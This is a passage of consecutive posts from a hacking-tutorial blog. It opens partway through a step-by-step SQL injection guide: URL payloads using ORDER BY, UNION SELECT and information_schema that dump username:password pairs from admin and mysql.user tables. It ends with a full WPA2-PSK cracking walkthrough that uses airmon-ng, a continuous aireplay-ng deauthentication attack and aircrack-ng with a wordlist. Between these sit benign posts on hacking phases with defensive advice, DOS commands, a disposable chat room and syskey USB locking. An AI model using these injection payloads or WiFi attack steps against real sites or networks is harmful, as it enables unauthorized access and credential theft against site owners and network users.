http://www.website.com/news.php?id=1 order by 1/*      <– No Error
http://www.website.com/news.php?id=1 order by 2/*      <– No Error
http://www.website.com/news.php?id=1 order by 3/*      <– No Error
http://www.website.com/news.php?id=1 order by 4/*      <– Error

We’ll get message like this: Unknown column ‘4’ in ‘order clause’ or something like that which means the database has 3 columns, as we got an error on 4.

3) Check for UNION function: 

We now are going to use the “UNION” command to find the vulnerable columns because with the union command we can select more data in one SQL statement. So we have –
http://www.website.com/news.php?id=1 union all select 1,2,3/* (As we’ve already found that the number of columns is 3 in the second step.)

If we see some numbers on the screen, i.e 1 or 2 or 3 then the UNION works.

4) Check for DataBase Version:

We now need to find the database version, name, and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
Or if these don’t work then try:
@@user
@@version
@@database

The URL would look like:
http://www.website.com/news.php?id=1 union all select 1,user(),version(),3/*

If you get an error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …” Then what we need is convert() function (I didn’t see any website article covering this problem, So I must cover it.)

i.e. http://www.website.com/news.php?id=1 union all select 1,convert(@@version using latin1),3/*

Or with hex() and unhex()

i.e. http://www.website.com/news.php?id=1 union all select 1,unhex(hex(@@version)),3/*

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.

IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

5) Obtaining Table And Column Name:

In this step, We aim to list all the table names in the database. The “table_name” goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables. But in most of the cases, we must guess table and column name.

common table names are: user/s, admin/s, member/s, etc.

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc.

URL would be http://www.website.com/news.php?id=1 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that’s good)

We know that table admin exists. . .Now to check column names –

http://www.website.com/news.php?id=1 union all select 1, username, 3 from admin/* (if you get an error, then try the other column name)

We get username displayed on the screen, the example would be the admin, or superadmin etc. . .Now to check if column password exists –
http://www.website.com/news.php?id=1 union all select 1, password, 3 from admin/* (if you get an error, then try the other column name)

We’ll see the password on the screen in Hash or Plain-Text format, it depends on how the database is set up i.e md5 hash, mysql hash, sha1, etc.

Now we must complete query as of our need. And for that, we can use concat() function (it joins the strings).
i.e. http://www.website.com/news.php?id=1 union all select 1, concat(username,0x3a,password),3 from admin/*

Note: Here, I used 0x3a, its hex value for colon)
(The another way is to use ASCII Value for that. Example: char(58))

http://www.website.com/news.php?id=1 union all select 1,concat(username,char(58),password),3 from admin/*

Now we get displayed username: password on screen, i.e admin: admin or admin: HACKAGON

When you have this, you can login like admin or some superuser. If can’t then guess the right table name, you can always try mysql.user (Default). It has user password columns, So the URL would be
http://www.website.com/news.php?id=1 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6) Incase of MySQL 5:

Uptil step 5 is for MySQL version < 5 (i.e 4.1.33, 4.1.12, etc.) But for MySQL 5 we need information_schema. It holds all tables and columns in the database. To get tables, we use table_name and information_schema.tables.
i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables/*

Here we replace our number 2 with table_name to get the first table from information_schema.tables displayed on the screen. Now we must add LIMIT to the end of the query to list out all tables.
i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
Note: Here, I put 0,1 (Get 1’s result starting from the 0th)

Now to view the second table, we’ll change limit 0,1 to limit 1,1
i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

The second table is displayed. Now for the third table, we put limit 2,1
i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

Keep incrementing the limit until you get some useful table like db_admin, poll_user, auth, auth_user, etc.

To get the column names, the method will be the same. Where we use column_name and information_schema.columns.

The method will be as same as above. So the example would be –

http://www.website.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

The first column is diplayed. The second one (we change limit 0,1 to limit 1,1)
i.e. http://www.website.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

The second column is displayed, so keep incrementing the limit until you get something like username, user, login, password, pass, passwd, etc.

If you wanna display column names for specific table use this query (where clause). Let’s say that we found table users.
i.e. http://www.website.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns where table_name=’users’/*

Now we’ll get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Note: This wouldn’t work if the magic quotes are ON.

Let’s say that we found columns user, pass, and email. Now complete the query to put them all together. For that we use concat(), As I used it earlier.
i.e. http://www.website.com/news.php?id=1 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/

We’ll get here user:pass:email from table users. Example: admin:hash:xyz@abc.com

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

Hope you like this article. So, don’t forget to share it with your friends and also feel free to drop a comment below if you still face any kind of problem.


HACKING meant to possess extraordinary computer skills able to extend the limits of computer systems and besides that understanding, the victim is an essential component of a successful defense. However, today there are automated tools and codes available on the Internet that make it possible for anyone with a will and desire to hack and succeed. The ease with which system vulnerabilities can be exploited increased while the knowledge curve required to perform such exploits shortened. The concept of the elite/super hacker is an illusion. So HACKAGON listed down the Phases Of Hacking for the ease of HACKERS.

However, hackers are generally intelligent individuals with good computer skills and the ability to create and explore into the computer’s software and hardware. Their intention can be either to gain knowledge or dig around to do illegal things. Attackers are motivated by the zeal to know more while malicious attackers intend to steal data.

Phases Of Hacking Hackagon

About Phases Of Hacking:

The process could be divided into five distinct phases. There are different models but this one is common. White, black or grey hat hackers use the equivalent process. So, it is also important to understand the sequence of phases. Indeed, the result or the output of a phase is used in the following. It is not enough to run just security tools. It is vital to understand the order in which they are used to perform a penetration test complete and realistic.

Five Phases of Hacking

Phase#1  Reconnaissance

Reconnaissance is probably the longest phase, sometimes lasting weeks or months.  The black hat uses a variety of sources to learn as much as possible about the target victim and how it operates, including:

  • Internet searches
  • Social engineering
  • Dumpster diving
  • Domain names management/search services
  • Non-intrusive network scanning

The activities in this phase are not easy to defend against.  Information about an organization finds its way to the Internet via various routes.  Employees are often easily tricked into providing tidbits of information which, over time, act to complete a complete picture of processes, organizational structure, and potential soft spots.  However, there are some things you can do which make it much harder for an attacker, including

  • Make sure your systems don’t leak information to the Web, including:
    • Software versions and patch levels
    • Email addresses
    • Names and positions of key personnel
  • Ensure proper disposal of printed information
  • Provide generic contact information for domain name registration lookups
  • Prevent perimeter LAN/WAN devices from responding to scanning attempts

Phase#2  Scanning And Enumeration

Once the attacker has enough information to understand how the business works and what information of value might be available, he or she begins the process of scanning perimeter and internal network devices looking for weaknesses, including:

  • Dialers
  • Port scanners
  • Internet Control Message Protocol (ICMP) scanners
  • Ping sweeps
  • Network mappers
  • Simple Network Management Protocol (SNMP) sweepers
  • Vulnerability scanners

Scans of perimeter and internal devices can often be detected with intrusion detection (IDS) or prevention (IPS) solutions, but not always.  Veteran black hats know ways around these controls.  In any case, some steps you can take to thwart scans include

  • Shutting down all unneeded ports and services
  • Allow critical devices, or devices housing or processing sensitive information, to respond only to approved devices
  • Closely manage system design, resisting attempts to allow direct external access to servers except under special circumstances and constrained by end-to-end rules defined in access control lists
  • Maintain proper patch levels on endpoint and LAN/WAN systems

Phase#3  Gaining Access

Gaining access to resources is the whole point of a modern-day attack.  The usual goal is to either extract information of value to the attacker or use the network as a launch site for attacks against other targets.  In either situation, the attacker must gain some level of access to one or more network devices.

In addition to the defensive steps described above, security managers should make every effort to ensure end-user devices and servers are not easily accessible by unauthenticated users.  This includes denying local administrator access to business users and closely monitoring domain and local admin access to servers.  Further, physical security controls should detect attempts at a hands-on attack, and delay an intruder long enough to allow effective internal or external human response (i.e., security guards or law enforcement).

Finally, encrypt highly sensitive information and protect keys.  Even if network security is weak, scrambling information and denying attacker access to encryption keys is a good final defense when all other controls fail.  But don’t rely on encryption alone.  There are other risks due to weak security, such as system unavailability or use of your network in the commission of a crime.

Phase#4  Maintaining Access

Having gained access, an attacker must maintain access long enough to accomplish his or her objectives.  Although an attacker reaching this phase has successfully circumvented your security controls, this phase can increase the attacker’s vulnerability to detection.

In addition to using IDS and IPS devices to detect intrusions, you can also use them to detect extrusions.  A short list of intrusion/extrusion detection methods, described in Chapter 3 – Extrusion Detection Illustrated (Extrusion Detection: Security Monitoring for Internal Intrusions, Richard Bejtlich, 2006), includes

  • Detect and filter file transfer content to external sites or internal devices
  • Prevent/detect direct session initiation between servers in your data center and networks/systems not under your control
  • Look for connections to odd ports or nonstandard protocols
  • Detect sessions of unusual duration, frequency, or amount of content
  • Detect anomalous network or server behavior, including traffic mix per time interval

Phase#5  Covering Tracks

After achieving his or her objectives, the attacker typically takes steps to hide the intrusion and possible controls left behind for future visits.  Again, in addition to anti-malware, personal firewalls, and host-based IPS solutions, deny business users local administrator access to desktops.  Alert on any unusual activity, any activity not expected based on your knowledge of how the business works.  To make this work, the security and network teams must have at least as much knowledge of the network as the attacker has obtained during the attack process. Examples of activities during this phase of the attack include

  • Steganography
  • Using a tunneling protocol
  • Altering log files

This article about Phases Of Hacking is not intended to make you an expert in network defense. Instead, it should serve as an introduction to methods employed by black hat hackers when compromising an information resource. Armed with this information, security professionals are better prepared to prepare for battle, locating and engaging the enemy wherever or whenever necessary.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

Hope you like this article. So, doesn’t forget to share it with your friends and also feel free to drop a comment below if you still face any kind of problem.


Whether you’re a HACKER or a Normal Person, chatting is a familiar habit for everybody to deal with. But sometimes the so-called insecurity factor come forth and we want to maintain anonymity in our chat. So HACKAGON will show you the way to create your own Hacker Style Disposable Chat Room that destroys itself when the chat’s over.

Disposable Chat Room

Steps To Create Disposable Chat Room:

  1. Visit https://hack.chat by just clicking on it.
  2. Add a “?” and a String of text to the URL. For example, https://hack.chat/?HACKAGON will create a Disposable Chat Room named “HACKAGON” (You can use whatever name you want).disposabe chat room hackagon
  3. Then it’ll ask for your nickname to chat with, So Enter a nickname whatever you want and you are ready to chat.
  4. Share your personal chat room URL to anyone you want to talk in private.

There are no channel lists kept anywhere, so random people won’t show up in your hack.chat. Formatting is possible with LaTeX markup, too. A chatroom can be disposed at any point after the completion of chats.

Creator of “hack.chat“, Andrew Belt, a student at the University of Tennessee, promises that no message history is kept on the hack.chat servers, so random channel names can be created for purely private discussions without worrying about privacy.

Enjoy with your own Hacker Style Disposable Chat Room. Chat in Private and also stay genuinely anonymous.

Hope you like this article. So, don’t forget to share it with your friends and also feel free to drop a comment below if you still face any kind of problem.


Disk Operating System (DOS), is an acronym for several computer Operating Systems that were operated by using the command line. So HACKAGON collaborated A LIST OF DOS COMMANDS which will make you a better programmer.

List Of DOS Commands Hackagon

MS-DOS dominated the IBM PC compatible market between 1981 and 1995, or until about 2000 including the partially MS-DOS-based Microsoft Windows (95, 98, and Millennium Edition). “DOS” is used to describe the family of several very similar command-line systems, including MS-DOS, PC-DOS, DR-DOS, FreeDOS, ROM-DOS, OSx16, “Horizon OS” and PTS-DOS.

In spite of the common usage, none of these systems were simply named “DOS” (a name given only to an unrelated IBM mainframe operating system in the 1960s). A number of unrelated, non-x86 microcomputer disk operating systems had “DOS” in their names, and are often referred to simply as “DOS” when discussing machines that use them (e.g. AmigaDOS, AMSDOS, ANDOS, Apple DOS, Atari DOS, Commodore DOS, CSI-DOS, ProDOS, and TRSDOS). While providing many of the same operating system functions for their respective computer systems, programs running under any one of these operating systems would not run under others.

LIST OF DOS COMMANDS

First of all open command Prompt
Go to Start >> Run >> CMD

1. To create a new directory.
Command: C:\>mkdir hackagon Or C:\>md hackagon
[hackagon is your directory name]

2. To remove a directory.
Command: C:\>rmdir hackagon Or C:\>rd hackagon
[hackagon is your directory name].

3. To clear the screen.
Command: C:\>cls

4. To see the contents or subdirectory of a directory.
Command: C:\>dir Or C:\>dir /p
[“dir /p” to see the directory page by page].

Or C:\>dir /a
[“dir /a” to see all directories + hidden directories].

Or C:\>dir /ah
[“dir /ah” to see only hidden directories].

5. To change the directory.
Command: C:\>cd hackagon
[hackagon is your directory name].

C:\>cd..
[cd followed by 2 periods takes you one level up i.e to the parent directory]

C:\>cd\
[cd followed by backslash periods takes you to the top directory i.e directly under the drive]

6. To rename a directory or file.
Command: C:\>ren hackagon newhackagon
[By this command the folder hackagon will be renamed to newhackagon].

7. To move a file from one destination to another.
C:\>move <sourcepath> <destinationpath>
Command: C:\>move C:\hackagon.txt D:\
[hackagon.txt is your directory name].

8. To create a new file.
Command: C:\>copy con hackagon.txt
[Once you created the file press Enter and type the information inside the file and to save the file hold Ctrl+Z. This will return ^Z. Once this has been entered press Enter to save and exit the file.].
[hackagon.txt is your file name].

9. To see the content of a text file.
Command: C:\>type hackagon.txt
[hackagon.txt is your file name].

10. To delete a file.
Command: C:\>del hackagon.txt
[hackagon.txt is your file name].

11. To edit a file.
Command: C:\>edit hackagon.txt
[hackagon.txt is your file name].

12. To copy a file from one destination to another.
C:\>copy <sourcepath> <destinationpath>
Command: C:\>copy C:\hackagon.txt D:\
[hackagon.txt is your file name].

13. To copy a directory from one destination to another.
C:\>xcopy <sourcepath> <destinationpath> /s
Command: C:\>xcopy C:\hackagon D:\ /s
[hackagon is your directory name]

14. Exit from the command prompt.
Command: C:\>exit

Enjoy the knowledge and manipulate your computer with your own. Hope you like this article. So, don’t forget to share it with your friends and also feel free to drop a comment below if you still face any kind of problem.


I’ve always been fascinated by the movies where a geek inserts the Pendrive into PC to log in, something like NSA mainframe style. This can also be a method to keep your confidential information confidential when you’re away from the keyboard. So learn how to Lock And Unlock Computer With Pendrive here in HACKAGON.

Lock And Unlock Computer With Pendrive Hackagon

If you prevent access to your computer with just a password, you are missing out on an alternate and more secure way to lock down your computer.

Steps To Lock And Unlock Computer With Pendrive:

STEP 1: Insert your Pendrive into your system and wait for it to be recognized.

STEP 2: Go to Start >> Control Panel >> Administrative Tools >> Computer Management >> Disk Management Or directly type diskmgmt.msc in Run.

disk management hackagon

STEP 3: Then Right-click the partition whose name you want to change (click in the white area just below the word “Volume”) and Select “Change Drive Letter and Paths…

pendrive management hackagon
From here you can re-assign the drive letter it was given to “A” (Drive letter of Pendrive must be “A”).

STEP 4: Start >> Run >> syskey.

syskey hackagon

Click on “OK

syskey window hackagon

Syskey launched: Click “Update

Startup Key Hackagon

Choose “Store Startup Key on Floppy Disk” and Click “OK

save startup key hackagon

You’ll be prompted to enter your diskette. Make sure your Pendrive is inserted and writable. Restart and have fun. Don’t lose yours Pendrive. And, to revert this, you can run syskey again and choose to store it locally instead of “On a floppy disk”.

Enjoy the trick and Stay Secure. Hope you like this article. So, don’t forget to share it with your friends and also feel free to drop a comment below if you still face any kind of problem.


WiFi is getting so much essential as days are passing but WPA2-PSK may not be as safe as you think. There are a few attacks against WAP2-PSK. One of the most common attacks is against WPA2 is exploiting a weak passphrase and that’s sometimes also called Dictionary Attack. So Let’s see How to Hack WPA2-PSK WiFi Password Using Linux.

Cracking WPA2 wifi password is not really an easy task to do, you can’t crack it with a mouseclick as they show in movies and there is no software that will give you the password without some hard work but you don’t worry HACKAGON can show you how to crack it with few easy steps and we will do it using aircrack-ng.

Hack WPA2-PSK WiFi Password Using Linux Hackagon

When Wi-Fi was first developed in the late 1990s, Wired Equivalent Privacy (WEP) was created to give wireless communications confidentiality. WEP, as it became known, proved terribly flawed and easily cracked. As a replacement, most wireless access points now use Wi-Fi Protected Access II with a pre-shared key for wireless security, known as WPA2-PSK. WPA2 uses a stronger encryption algorithm, AES, that’s very difficult to crack—but not impossible.

The weakness in the WPA2-PSK system is that the encrypted password is shared in what is known as the 4-way handshake. When a client authenticates to the access point (AP), the client and the AP go through a 4-step process to authenticate the user to the AP. If we can grab the password at that time, we can then attempt to crack it.

Also Read ==> Top 12 wifi hacking app for Android
Also Read ==> 2 Best Methods to Hack Wi-Fi using Android Phones

Requirements: To Hack WPA2-PSK WiFi Password Using Linux

  1. Kali Linux or any Pentesting Linux Distros with aircrack-ng installed in it. if you don’t have aircrack-ng suite get it by this command in terminal sudo apt-get install aircrack-ng
  2. A Wireless Network Adapter that support monitor mode like Alfa 2W AWUS036NH, Alfa AWUS036H, wifiy-city 56G, or you can check this page here for card compatibility by clicking on >> Compatibility Drivers.
  3. A wordlist comprising of all the possible different combination of pass-phrases.

Let’s See How To Hack WPA2-PSK WiFi Password Using Linux

1) open up your Root Terminal as root and type ifconfig this will show you all the networking interfaces connected to your device.

ifconfig Hackagon

if your wireless network adapter is working fine you should see the “wlan0” the name may change if you have more than one connected wireless adapter.

2) Now to start monitor mode type airmon-ng start wlan0.

airmon-ng is a traffic monitoring tool.
wlan0 is your Wireless Interface.

After this command, It’ll start the monitor mode.

airmon-ng Hackagon

As it’s seen the monitor mode is working under “wlan0mon“, So this is your card name for now.

We can see there is a list of Process ID’s (PID) and that will cause trouble during the process so we’ll kill those processes by typing “kill <pid>” in my case, it is “kill 1210 1341 1591 1592“.

kill terminal command hackagon

3) To show the list of available WiFi Network Type airodump-ng wlan0mon.

airodump-ng is a WiFi Packet Capturing Tool.
wlan0mon is my Monitoring Interface.

airodump-ng Hackagon

airodump-ng will start capturing all packets.

airodump-ng captured packets hackagon

From the captured packets select your target and note its ‘BSSID‘ (BSSID = Base Service Set Identifier) and ‘Channel‘. Then stop the capture using “ctrl+c“.

4) Start capturing the packets of your target network by typing airodump-ng -c -w –bssid wlan0mon and in my case, it is airodump-ng -c 1 -w HACKAGONwpa2 –bssid 74:DA:38:24:CF:34 wlan0mon.

Captured WiFi Packets Hackagon

This will start capturing the packets and if you get the handshake then you won’t need the aireplay-ng command but in case if you don’t get the handshake while capturing of packets goes on, open a new terminal as root and type aireplay-ng -0 0 -a mon0.

aireplay-ng => Tool for Deauthentication, Fake Authentication, and Other Packet Injections.
-0 => Number Associated for Deauthentication.
0 => Deauth Count.
-a => bssid here we are trying to send a deauthentication request.
In my case, the command looks like aireplay-ng -0 0 -a 74:DA:38:24:CF:34 wlan0mon.

aireplay-ng deauth hackagon

After few seconds stop it using ‘Ctrl+c‘.
Now after we have successfully captured the WPA handshake it’ll look like:

WPA Handshake Hackagon

5) Stop the capture using ‘Ctrl+c‘ and type ‘ls‘ that would bring up all the current directories and files.

WiFi Captured Files Hackagon

Now, Select the file with ‘.cap‘ extension and type aircrack-ng -w
aircrack-ng=> Tool that helps in cracking the password.
In my case, the command looks like aircrack-ng -w /usr/share/wordlists/rockyou.txt ‘/root/HACKAGONwpa2-01.cap’.

aircrack-ng hackagon

Now it starts finding suitable passphrase.

WPA2 Passphrase Hackagon

And now all you have to do is to wait till you see the lovely news (KEY Found).

Summing Up All Step in few lines:

  1. ifconfig
  2. airmon-ng start wlan0
  3. airodump-ng wlan0mon
  4. airodump-ng -c 1 -w HACKAGONwpa2 –bssid 74:DA:38:24:CF:34 wlan0mon
  5. aireplay-ng -0 0 -a 74:DA:38:24:CF:34 wlan0mon
  6. aircrack-ng -w /usr/share/wordlists/rockyou.txt ‘/root/HACKAGONwpa2-01.cap’

Also Read ==> Top 12 wifi hacking app for Android
Also Read ==> 2 Best Methods to Hack Wi-Fi using Android Phones

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

Hope you like this article. So, don’t forget to share it with your friends and also feel free to drop a comment below if you still face any kind of problem.